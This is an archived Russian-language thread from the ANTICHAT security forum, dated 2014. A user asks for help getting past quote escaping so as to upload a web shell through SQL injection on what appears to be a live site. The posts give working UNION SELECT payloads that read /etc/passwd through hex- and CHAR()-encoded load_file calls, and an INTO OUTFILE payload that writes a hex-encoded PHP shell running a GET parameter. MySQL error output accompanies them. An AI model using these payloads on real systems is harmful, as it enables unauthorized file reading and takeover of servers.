HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Необходима помощь в обходе Magic Quotes в загрузке Shell'a
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.02.2014, 19:13
2Polar
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Добрый день, помогите, пожалуйста, обойти блокировку кавычек для заливки шелла. Права на заливку есть.

-3+UNION+ALL+SELECT+1,2,3,

load_file(0x2f6574632f706173737764)

,5,6,7,8,9,10,11,12,13,14,15,16,17,18,

19,20,21,22,23,24,25,26,27--

- подобный запрос без ошибок открывает файл /etc/passwd.

Если убрать hex, load_file('/etc/passwd')

-3+UNION+ALL+SELECT+1,2,load_file(%27/etc/passwd%27),4-- выдает



DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/etc/passwd'),4--' at line 1

(в идентичном параметре, поэтому разное кол-во колонок)

Заливка шелла:

-3+UNION+ALL+SELECT+1,2,3,0x3c3f696e636c75646528245 f4745545b22636d64225d293b3f3e,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+INTO+O UTFILE+%27/tmp/smthng.txt%27--


выдает:

[COLOR="Red"]

DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/tmp/smthng.txt'-- AND publish_date
 
Ответить с цитированием

  #2  
Старый 09.02.2014, 20:12
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
В 1 из 1000 случаев поможет

/showpost.php?p=663815&postcount=25 .
 
Ответить с цитированием

  #3  
Старый 09.02.2014, 20:25
2Polar
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
-3+UNION+ALL+SELECT+1,2,3,load_file(char(39,47,116, 109,112,47,114,105,118,97,46,112,104,112,39)),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27--

вот такой char код загружается без проблем. мб им можно кавычки как то проставить?
 
Ответить с цитированием

  #4  
Старый 09.02.2014, 20:30
2Polar
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
-2+union+all+select+0x27,2,3,4--+ - не выдает ошибок почему-то, хотя кавычка выставлена

если в конце /* - ошибка выходит

при hex запросе 0x5c272f6574632f7061737377645c27 = '/etc/passwd' выводит

\'/etc/passwd\'

kingbeef, запрос из той ссылки не работает. экранирует кавычки
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ